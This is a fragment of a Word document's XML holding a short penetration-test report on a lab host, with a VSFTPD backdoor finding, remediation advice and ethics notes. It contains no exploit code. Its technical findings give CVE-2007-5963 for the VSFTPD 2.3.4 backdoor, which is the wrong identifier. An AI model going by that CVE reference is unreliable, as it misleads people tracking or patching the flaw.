          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF23216" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="003043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21C03B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| Timestamp | Target IP | Vulnerability | PTES Phase |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D87DA2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|-----------|-----------|---------------|------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958A6C4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| 2025-08-30 15:00:00 | 192.168.1.200 | VSFTPD Backdoor RCE | Exploitation |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79026ADE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| 2025-08-30 15:10:00 | 192.168.1.200 | Privilege Escalation | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D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6CCAB34B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374D2CC6" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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7D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AE7A8" w14:textId="77777777" w:rsidR="00207D89" w:rsidRPr="00207D89" w:rsidRDefault="00207D89" w:rsidP="003043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BB6A65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This engagement identified critical vulnerabilities in the target infrastructure, leading to complete system compromise. The primary issue was an outdated VSFTPD service containing a known backdoor, allowing unauthenticated remote code execution as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED5C96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7305D3A9" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4195ED43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- CVE-2007-5963: VSFTPD v2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBE85A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- Impact: Root-level compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD8356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- Attack Vector: Unauthenticated network access to port 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25344E63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62B00521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Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1A2AD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1. Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A789A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   - Upgrade VSFTPD to latest version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4176CD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- Implement firewall rules to restrict FTP access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39775B8F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- Conduct credential rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300428F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2C0637F9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2. Long-term Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E2500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- Establish patch management process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE26CD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- Implement network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172349FC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- Deploy intrusion detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA1546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2C6EF845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3. Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383740BD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- Rescan with OpenVAS to confirm remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB6C0D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 xml:space="preserve">   - Perform penetration test validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425078E2" w14:textId="77777777" w:rsid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43BDAB7A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</w:p>
    <w:p w14:paraId="243A56FC" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Legal &amp; Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27D610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- All testing performed in isolated lab environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C1FD2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- Proper authorization obtained for all targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D8670" w14:textId="77777777" w:rsidR="0030439D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- Educational purposes only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53460930" w14:textId="27CB7E03" w:rsidR="0075324E" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Follow responsible disclosure principles</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0075324E" w:rsidRPr="0030439D" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8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845A9" w14:textId="77777777" w:rsidR="000748A0" w:rsidRDefault="000748A0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3992C080" w14:textId="77777777" w:rsidR="000748A0" w:rsidRDefault="000748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DC92" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="67EEA394">
        <v:rect id="_x0000_i1025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201D6" w14:textId="77777777" w:rsidR="000748A0" w:rsidRDefault="000748A0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34642AA0" w14:textId="77777777" w:rsidR="000748A0" w:rsidRDefault="000748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1FCB" w14:textId="68D5EA92" w:rsidR="00C776D2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5AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18BEB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040F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BB4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F6326"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F162E2C6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376DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA24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C21D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E8C7A6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D4071F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D10E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97ADD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3B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3B5202"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AA6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35E56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3B25638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9314F1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A76C6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A53598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B062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F678B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D02F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4F75E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06E2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D91896"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DED6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1622A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ABC0C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8D63F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B05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760EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB64C894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261D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEB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B91C20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43FEB28C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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21977EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6B040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452598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F300E1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1563334E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06B2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8B201C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14DE0FEE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64C180F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="757A3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180D59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D688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8DB309F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB68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3B2965"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D49C254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93635E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A40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F62AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CD0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450491"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CDC21FE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1AE16C92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB6A8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B220AD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4A2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261D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="978693C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7F428E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C6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E8734D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="690A2D8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1464D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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2C4F0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42980D00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16E28B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65140F0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24F783F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6D6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191FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD96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844335"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11FA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0A5E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F56584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DC44C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BE2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74B12FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF0AD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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="292F308B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C208265C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29DB607F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCB26F3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2A984BD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EE0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062D84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB64C894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A82144"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24DEBD0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0D103E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C04C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C06D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76286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2BC1B4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="750A5D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339768D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C45A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B975C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC7A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2458B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78A4C9A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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="397C166D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197C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375ACB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F056A3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33331C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA02A0A4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FC7937"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3E0861C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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4083102C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="102CB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0B93407"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="415602C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8D6F43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7136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E31199"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B16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5C3491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D350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27072F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9564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C333CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="326221BC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E003E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4718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7A0BE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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4A2791"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4F2027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DB1609"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1056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EF6390"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D70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3F35EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A94EC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5A85771"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1156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525E58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="553E905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DE20D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="243C59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E4457C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA0ECA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EE53A38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C08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DD1754"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50B4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39671F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B316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97B6E2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3EC19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1D0BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C10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DF6397"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6824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F7B189F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA22C34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966FEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF20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B3398A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="529A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DA599E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73F05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475750A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CBA54A4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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="764622F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BC2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50662A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38D8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2722EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E40E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79614592"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86F0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EC215B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF002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A6A064B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2668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BE1F1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA0A028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023D5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEE0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762A05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77A0B4D8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7DCA06FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F300E1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01342301">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1896964843">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1910381895">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1729955620">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="953825194">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1085419029">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1979531761">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="465778830">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1589927102">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="256065570">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1786539672">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="848180348">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1243102479">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="590432118">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1137456812">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="920525112">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="238563811">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1158224892">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="963195899">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="521751643">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1300843007">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="476191204">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1936478540">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="242952956">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1895315912">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1697465447">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="367999139">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1818447329">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1468938946">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1122265394">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1788426580">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1261260531">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="710612864">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1469932942">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="667948830">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="965701919">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1318922606">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="95365836">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="370617169">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="649408278">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="598559580">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1981379331">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="331834968">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="83307525">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1442606227">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1462962448">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1098058080">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="431122247">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="120609202">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="390036205">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1334187153">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1051349824">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="711419891">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="633365432">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1429346398">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1573349917">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="787117207">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="48890646">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="2085570239">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="364448022">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1152596234">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1377896110">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="655691264">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1317606821">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="789013462">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="206719350">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1504777581">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="628318131">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="142698091">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="2034259573">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="1075054461">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1182160658">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="766269071">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="1607152026">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1988435109">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="1823110163">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="180045706">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="689377092">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="1996259248">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="629288582">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="435058264">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="1625847363">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="1878855596">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="1153640496">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="1867671652">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="868882050">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="1484926903">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="2080974877">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="1497376621">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="144052901">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="435058515">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="1844584078">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="1774864786">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="1069962632">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="43608153">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="55671373">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="91705865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032A9E"/>
    <w:rsid w:val="000748A0"/>
    <w:rsid w:val="00097703"/>
    <w:rsid w:val="000B02BC"/>
    <w:rsid w:val="00195E8F"/>
    <w:rsid w:val="00207D89"/>
    <w:rsid w:val="00241B6D"/>
    <w:rsid w:val="002E1763"/>
    <w:rsid w:val="00304247"/>
    <w:rsid w:val="0030439D"/>
    <w:rsid w:val="00356C4E"/>
    <w:rsid w:val="00380392"/>
    <w:rsid w:val="003A3E79"/>
    <w:rsid w:val="003A6E85"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="003D258E"/>
    <w:rsid w:val="003D3846"/>
    <w:rsid w:val="00431397"/>
    <w:rsid w:val="004D0CEB"/>
    <w:rsid w:val="00550349"/>
    <w:rsid w:val="00553C99"/>
    <w:rsid w:val="00554C47"/>
    <w:rsid w:val="005B0311"/>
    <w:rsid w:val="0075324E"/>
    <w:rsid w:val="007549E1"/>
    <w:rsid w:val="007F66BD"/>
    <w:rsid w:val="009370F9"/>
    <w:rsid w:val="00996618"/>
    <w:rsid w:val="009F07BB"/>
    <w:rsid w:val="00A0312F"/>
    <w:rsid w:val="00A15A16"/>
    <w:rsid w:val="00A42989"/>
    <w:rsid w:val="00A966AB"/>
    <w:rsid w:val="00AB177C"/>
    <w:rsid w:val="00AC501C"/>
    <w:rsid w:val="00B156B8"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00CC1B98"/>
    <w:rsid w:val="00CC2731"/>
    <w:rsid w:val="00D429D2"/>
    <w:rsid w:val="00D51177"/>
    <w:rsid w:val="00DD11F5"/>
    <w:rsid w:val="00DF63DB"/>
    <w:rsid w:val="00E24C3A"/>
    <w:rsid w:val="00E26014"/>
    <w:rsid w:val="00E45CF9"/>
    <w:rsid w:val="00ED4312"/>
    <w:rsid w:val="00EE55D1"/>
    <w:rsid w:val="00EE7586"/>
    <w:rsid w:val="00F409C7"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="00F86E8F"/>
    <w:rsid w:val="00FC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  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D511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177"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable1Light-Accent2">
    <w:name w:val="Grid Table 1 Light Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00AC501C"/>
    <w:pPr>
      <w:spacing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AC501C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EE758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E7586"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
